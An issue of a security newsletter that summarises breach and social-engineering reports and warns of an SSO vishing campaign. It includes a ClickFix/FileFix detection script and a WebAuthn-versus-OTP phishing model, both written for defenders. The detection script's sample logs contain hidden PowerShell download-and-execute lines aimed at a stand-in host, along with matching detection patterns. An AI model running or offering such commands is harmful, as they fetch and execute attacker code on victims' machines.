
Record breach levels, social engineering dominating, and an active campaign targeting 100+ organizations.

Last Modified Date: Feb 18, 2026
The Optery Dispatch

Welcome to The Optery Dispatch — a newsletter delivering the latest insights on threat intelligence and proactive cybersecurity strategy. In Issue #10, published February 17, 2026, we cover:

  • ITRC 2025 Data Breach Report: Phishing, smishing, and BEC remain the #1 root cause across sectors as breach transparency continues to decline.
  • Check Point 2026 Cyber Security Report: Social engineering dominates, and organizations must align threat intelligence with exposure reduction to cut attack volume.
  • Active SSO Campaign Alert: ShinyHunters and affiliates target 100+ organizations using live phishing panels and vishing.

Breach Activity Hits Record High as Social Engineering Remains the Leading Root Cause

The ITRC’s 2025 report shows phishing, smishing, and BEC dominating across public and private sectors

The Identity Theft Resource Center’s 2025 Data Breach Report shows that breach activity remains at historic highs, with 3,322 publicly reported data compromises in the U.S., the highest annual total on record.

Phishing, smishing, and business email compromise ranked as the leading root cause of data breaches, increasing slightly year over year and reinforcing that social engineering remains the primary initial access vector for attackers.

Financial Services remained the most targeted sector, while Professional Services (lawyers, accountants, consultants) saw the largest growth in attacks, as attackers use these firms as stepping stones into their many clients.

The report highlights a continued decline in breach transparency. Only 30% of breach notices in 2025 included information about how the breach occurred, down from near-universal disclosure just five years ago, leaving organizations and individuals in the dark about how to protect themselves.

The ITRC also underscores the economic ripple effects of cyber incidents. Eighty-one percent of small businesses reported experiencing a cyberattack, data breach, or both in the past year, with many involving AI-enabled tactics. As a result, nearly 40% said they increased prices to offset remediation and recovery costs, effectively shifting part of the financial burden to customers, “turning cyber-risk into a national inflationary issue.”

In addition to business impact, individuals face significant financial harm. Thirty-six percent of victims reported losing more than $10,000 to identity theft, fraud, or scams linked to data breaches. Among those who sought assistance from the ITRC, more than 20% lost over $100,000, and 11% reported losses exceeding $1 million.

The report notes that “as life-altering as the higher financial losses can be, they pale in comparison to the fact that 67 percent (67%) of victims shared with the ITRC that they had considered self-harm as a result of being the victim of identity theft, fraud or a scam.”

Eighty-eight percent of people who received a data breach notice experienced at least one negative consequence afterward, including more phishing or scam attempts (53.7%), more spam emails or robocalls (49.2%), and attempted account takeovers (40.3%).

For small businesses, the ITRC recommends adopting layered defenses. That includes limiting employee access to only the systems and data necessary for their roles, requiring strong authentication for critical systems (including multi-factor authentication and passkey-based logins), and closely evaluating the security practices of third-party vendors. The report also emphasizes the importance of keeping systems consistently patched through automated updates and maintaining ongoing employee training so staff can recognize and respond to increasingly sophisticated social engineering attempts, including those enhanced by AI.

As social engineering drives the majority of breaches, organizations should also proactively address the external data exposure that fuels these attacks, including employee information readily available through data broker sites.

Minimizing this data reduces the information available for social engineering and lowers the likelihood of targeted attacks.

For more findings, read the full report here: 2025-ITRC-Annual-Data-Breach-Report.pdf

The Human Element is the Most Exploited Attack Surface

Check Point’s 2026 Cyber Security Report documents a variety of social engineering techniques being used against organizations

Check Point’s latest report identifies the human component as the most easily and consistently exploited attack surface in 2025, with social engineering as the dominant attack vector.

While email remains the primary delivery channel for file-based malware (accounting for 82% of malicious file distribution in 2025), Check Point notes that social engineering has expanded far beyond traditional email. Attackers increasingly rely on multi-platform campaigns using phone calls, messaging apps, and real-time impersonation. At the same time, attackers shifted towards interaction-driven techniques like ClickFix, guiding users through legitimate-looking workflows that bypass controls and lead to malware execution.

ClickFix activity surged in 2025, increasing by roughly 500% year over year. It appeared in nearly half of all documented malware campaigns, highlighting how widely the technique has been adopted.

The success of ClickFix quickly led to new techniques such as FileFix. FileFix instructs users to paste attacker-controlled file paths into standard system dialogs, enabling compromise without traditional malware delivery.
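The following Python script is an added illustration of how a detection engineer might triage ClickFix- and FileFix-style execution in endpoint telemetry; it is not code from the Check Point report or from Optery. The key observation is that both the Win+R Run dialog and the File Explorer address bar spawn their children from explorer.exe, so an interpreter such as powershell.exe or mshta.exe launched directly from explorer.exe with a download-and-execute command line is the pivot for both techniques. The log lines are constructed Sysmon Event ID 1-style records, and the indicator lists and the trailing "#" decoy-path heuristic for FileFix are assumptions to tune against real telemetry, not a vendor rule set.

```python
"""Heuristic triage of ClickFix / FileFix-style execution in process-creation telemetry.

Added example. The log lines are constructed Sysmon Event ID 1-style records and
the indicator lists are illustrative assumptions, not a vendor rule set.
"""
import json
import re

# Interpreters a victim is typically told to launch from the Run box or the
# Explorer address bar (assumed starting list).
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                   "curl.exe", "bitsadmin.exe", "rundll32.exe", "msiexec.exe"}

# The Win+R Run dialog and the File Explorer address bar both spawn their
# children from explorer.exe, so that parent is the pivot for both techniques.
DIALOG_PARENTS = {"explorer.exe"}

# Command-line fragments common in pasted payloads (assumed/illustrative).
SUSPICIOUS_PATTERNS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-webrequest",
    r"\bmshta(?:\.exe)?\s+https?://", r"https?://[^\s'\"]+",
]

# FileFix: the command pasted into the address bar is often followed by a
# '#' comment holding a decoy file path so the bar still looks like a path.
FILEFIX_DECOY = re.compile(r"#\s*(?:[A-Za-z]:\\|\\\\)")

# Constructed sample telemetry (one JSON object per line), not real data.
SAMPLE_LOG = r'''
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c \"iex (irm https://captcha-verify.example/fix)\""}
{"EventID": 1, "ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c \"irm https://captcha-verify.example/p | iex\" # C:\\Users\\Public\\Documents\\report.pdf"}
{"EventID": 1, "ProcessId": 4200, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"}
{"EventID": 1, "ProcessId": 4311, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\WindowsApps\\WindowsTerminal.exe", "CommandLine": "powershell.exe -NoLogo -NoExit"}
'''


def base_name(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event looks like ClickFix/FileFix (empty list = clean)."""
    child, parent = base_name(ev.get("Image", "")), base_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    from_dialog = parent in DIALOG_PARENTS
    if from_dialog and child in LOLBIN_CHILDREN:
        reasons.append(f"{child} spawned by {parent} (Run dialog / Explorer address bar)")
    for pat in SUSPICIOUS_PATTERNS:
        if re.search(pat, cmd, re.IGNORECASE):
            reasons.append(f"command line matches /{pat}/")
    if from_dialog and FILEFIX_DECOY.search(cmd):
        reasons.append("trailing '#' decoy path after command (FileFix pattern)")
    return reasons


def verdict(reasons):
    """'high' needs the explorer.exe pivot plus at least one payload indicator."""
    dialog_pivot = any("spawned by" in r for r in reasons)
    if dialog_pivot and len(reasons) >= 2:
        return "high"
    return "medium" if reasons else "clean"


def triage(log_text):
    """Parse JSON-lines telemetry; return (ProcessId, verdict, reasons) per event."""
    out = []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        out.append((ev.get("ProcessId"), verdict(reasons), reasons))
    return out


if __name__ == "__main__":
    for pid, v, reasons in triage(SAMPLE_LOG):
        print(f"pid={pid} verdict={v}")
        for r in reasons:
            print("   -", r)
```

Run against the constructed sample, the two explorer.exe-spawned PowerShell launches score "high" (the second also carries the FileFix decoy-path indicator), while Notepad from Explorer and an interactive PowerShell from Windows Terminal stay "clean". Windows Security 4688 events carry the same parent/child/command-line fields, so the same logic applies to them once the field names are mapped.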

Attackers extended ClickFix-style social engineering beyond code execution to account takeover with ConsentFix. This technique manipulates legitimate Microsoft and Azure OAuth flows to obtain access tokens without capturing passwords or completing MFA, directly targeting cloud identity infrastructure.

Voice impersonation became a preferred method among sophisticated threat groups targeting major brands. These campaigns combine deep reconnaissance, multiple communication channels, and complex scripts, and were used to gain initial access in several of the most damaging enterprise intrusions of the year.

Another trend mentioned in the report is that attackers are increasingly engineering scenarios where victims initiate contact, such as abusing public “Contact Us” pages. This approach increases perceived legitimacy by aligning with normal job functions and enables long-running interactions before malware delivery. Similar victim-initiated patterns were observed in fake job recruitment campaigns targeting marketing and advertising professionals. By reversing the interaction flow and building trust over time, attackers significantly increase credibility and compromise success rates.

By late 2025, the report notes that AI had shifted from a support tool to an active participant in cyber operations, with documented campaigns showing AI systems capable of autonomously performing a significant portion of the intrusion lifecycle. Advances in voice cloning, face swapping, and automated scam platforms undermined traditional identity verification, while weaknesses in AI-related infrastructure introduced new paths for compromise.

The report also shows that non-enterprise devices are being favored as the initial point of compromise. Attackers are seeking to access corporate environments by first compromising less-secured endpoints, such as BYOD or otherwise unmanaged devices that are connected, directly or indirectly, to corporate networks. More than 76% of infected systems analyzed were non-corporate devices.

Check Point stresses that security programs must focus on stopping attacks as early as possible while recognizing that no single control is sufficient. Effective defenses prioritize prevention across multiple points in the attack chain and rely on layered safeguards to limit impact when prevention fails.

Attackers typically invest significant time in preparation activities such as impersonation infrastructure and reconnaissance. These early-stage activities often occur outside internal monitoring and represent the earliest opportunity for intervention.

Organizations that align threat intelligence with exposure reduction are better positioned to reduce incident frequency over time. Shrinking what attackers can see and exploit before an attack begins is essential. This must include exposed executive and employee data across the open web.

Read the full report here: Cyber Security Report 2026 | Check Point Software

ShinyHunters and Affiliates Target SSO Environments in Active Multi-Sector Campaign

Com-linked actors leverage voice impersonation and real-time credential interception to compromise SSO environments

Threat intelligence teams are warning of an active social engineering campaign targeting organizations through their single sign-on (SSO) environments.

The campaign is fueled by targeted voice phishing (“vishing”) attacks combined with company-branded phishing sites designed to steal single sign-on (SSO) credentials and multi-factor authentication (MFA) codes.

These phishing sites use advanced tooling that allows attackers to interact with victims in real time while they are logging in, enabling credentials and MFA tokens to be captured as they are entered. Once access is obtained, attackers have been observed enrolling new devices, moving laterally through internal tools, and exfiltrating data for extortion.

Based on observed infrastructure and targeting activity, between 100 and 150 organizations across financial services, healthcare, technology, real estate, manufacturing, logistics, energy, and biotech appear to be in scope.

This campaign follows tactics, techniques, and procedures associated with groups operating as part of ‘The Com’. This includes ShinyHunters and their affiliates, who are confirmed to be involved. Researchers at Silent Push have observed tradecraft aligning with “Scattered LAPSUS$ Hunters,” an affiliation of actors linked to Scattered Spider, LAPSUS$, and ShinyHunters.

Phishing-resistant MFA, such as FIDO2 security keys or passkeys, remains a critical defense against these attacks: the credential is bound to the legitimate site's origin, so a login captured on a lookalike phishing site cannot be replayed the way a relayed one-time code or push approval can.
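To make concrete why a live phishing panel can relay an OTP but not a FIDO2 login, here is an added, self-contained Python model of both flows; it is not code from Silent Push, Okta, Google, or Optery. The relying-party ID `sso.example.com`, the lookalike domain `sso-example-login.com`, and the authenticator's HMAC "signature" (standing in for a real ECDSA signature so the file runs offline) are assumptions. The WebAuthn checks themselves follow the specification: the browser refuses an rpId that does not match the page's origin, writes the real page origin into clientDataJSON, and the server verifies the challenge, origin and rpIdHash before the signature. The OTP side is RFC 4226/6238 HOTP/TOTP.

```python
"""Why a FIDO2/WebAuthn login survives a live phishing proxy while a relayed OTP does not.

Added example with a pure-stdlib model: the authenticator signs over
authenticatorData || SHA-256(clientDataJSON); the relying party (RP) checks
challenge, origin and rpIdHash before the signature. An HMAC stands in for
the real ECDSA signature (assumption, so the file runs offline).
"""
import hashlib
import hmac
import json
import secrets

RP_ID = "sso.example.com"                       # assumed RP ID
RP_ORIGIN = "https://sso.example.com"
PHISH_ORIGIN = "https://sso-example-login.com"  # constructed lookalike domain


class Authenticator:
    """A security key holding one credential scoped to a single rpId."""
    def __init__(self, rp_id):
        self.rp_id = rp_id
        self.key = secrets.token_bytes(32)      # stand-in for the private key

    def get_assertion(self, rp_id, client_data_json):
        if rp_id != self.rp_id:                 # credentials are scoped per rpId
            raise LookupError(f"no credential for rpId {rp_id}")
        auth_data = (hashlib.sha256(rp_id.encode()).digest()   # rpIdHash
                     + b"\x01" + (1).to_bytes(4, "big"))       # flags=UP, signCount
        msg = auth_data + hashlib.sha256(client_data_json).digest()
        return {"clientDataJSON": client_data_json, "authenticatorData": auth_data,
                "signature": hmac.new(self.key, msg, "sha256").digest()}


def browser_get(page_origin, rp_id, challenge, authenticator):
    """navigator.credentials.get() as the browser enforces it: it refuses an rpId that
    is not the page's host (or a registrable suffix of it) and writes the real page
    origin into clientDataJSON; page script cannot forge either."""
    host = page_origin.split("://", 1)[1]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError("SecurityError: rpId does not match the page origin")
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, separators=(",", ":")).encode()
    return authenticator.get_assertion(rp_id, client_data)


def rp_verify(assertion, expected_challenge, credential_key):
    """Relying-party checks in the order a WebAuthn server performs them."""
    cd = json.loads(assertion["clientDataJSON"])
    auth_data = assertion["authenticatorData"]
    if cd.get("type") != "webauthn.get":
        return False, "wrong clientData type"
    if not hmac.compare_digest(cd.get("challenge", ""), expected_challenge):
        return False, "challenge mismatch (replay)"
    if cd.get("origin") != RP_ORIGIN:
        return False, f"origin mismatch: {cd.get('origin')}"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user-presence flag not set"
    msg = auth_data + hashlib.sha256(assertion["clientDataJSON"]).digest()
    if not hmac.compare_digest(hmac.new(credential_key, msg, "sha256").digest(),
                               assertion["signature"]):
        return False, "bad signature"
    return True, "ok"


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP; totp() is RFC 6238 with a 30-second step."""
    h = hmac.new(secret, counter.to_bytes(8, "big"), "sha1").digest()
    off = h[-1] & 0x0F
    code = (int.from_bytes(h[off:off + 4], "big") & 0x7FFFFFFF) % 10 ** digits
    return f"{code:0{digits}d}"


def totp(secret, unix_time, step=30):
    return hotp(secret, unix_time // step)


def scenario_legitimate(authn):
    ch = secrets.token_urlsafe(32)
    return rp_verify(browser_get(RP_ORIGIN, RP_ID, ch, authn), ch, authn.key)


def scenario_aitm_proxy(authn):
    """The phishing panel relays the RP's real challenge and rpId to the victim,
    whose browser is on the lookalike origin: the browser refuses outright."""
    ch = secrets.token_urlsafe(32)
    try:
        browser_get(PHISH_ORIGIN, RP_ID, ch, authn)
    except PermissionError as e:
        return False, str(e)
    return True, "unexpected success"


def scenario_aitm_forged_origin(authn):
    """Even an assertion made for the phishing host (modelled with a second key scoped
    to it) is rejected by the RP on origin, and would also fail rpIdHash and signature."""
    ch = secrets.token_urlsafe(32)
    phish_authn = Authenticator("sso-example-login.com")
    a = browser_get(PHISH_ORIGIN, "sso-example-login.com", ch, phish_authn)
    return rp_verify(a, ch, authn.key)


def scenario_totp_relay(secret, unix_time):
    """The victim types the 6-digit code into the lookalike page; the proxy forwards
    it unchanged and the RP accepts it: nothing binds an OTP to an origin."""
    typed_on_phish_page = totp(secret, unix_time)
    return hmac.compare_digest(typed_on_phish_page, totp(secret, unix_time))


if __name__ == "__main__":
    key = Authenticator(RP_ID)
    print("legitimate FIDO2 login:", scenario_legitimate(key))
    print("FIDO2 via phishing proxy:", scenario_aitm_proxy(key))
    print("FIDO2 assertion forged on phish origin:", scenario_aitm_forged_origin(key))
    print("TOTP relayed through proxy accepted:", scenario_totp_relay(b"12345678901234567890", 59))
```

The proxy's real-time interception described above works precisely because an OTP is an opaque string that the relying party cannot tie to where it was typed; with WebAuthn, the browser either refuses to produce the assertion on the wrong origin or produces one the server rejects on its origin and rpIdHash checks, so the attacker gets nothing worth relaying.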

Given documented overlap and shared tradecraft among Com-affiliated groups, and prior confirmation from CISA and the FBI that Scattered Spider-linked operations leverage commercial data brokers for reconnaissance and social engineering, the same data-driven targeting model should be expected in this campaign.

Employee names, roles, phone numbers, and organizational context remain foundational inputs for these vishing attacks. Removing employee info from data broker sites and other publicly available sources can help prevent targeting.

Learn more:

Social Engineering Hackers Target Okta Single Sign On

Special Alert: SLSH Malicious “Supergroup” Targeting 100+ Organizations via Live Phishing Panels – Silent Push

Mandiant details how ShinyHunters abuse SSO to steal cloud data

A Cybercrime Merger Like No Other — Scattered Spider, LAPSUS$, and ShinyHunters Join Forces

Proactive Defense Against ShinyHunters-Branded Data Theft Targeting SaaS | Google Cloud Blog

Thanks for reading! Want us to write about something specific? Submit a topic or idea.

If you’re looking to reduce your organization’s exposed PII and prevent phishing, voice and messaging scams, credential theft, and other PII-based threats, Optery can help. Get started here: Optery for business

Subscribe to receive future editions of The Optery Dispatch
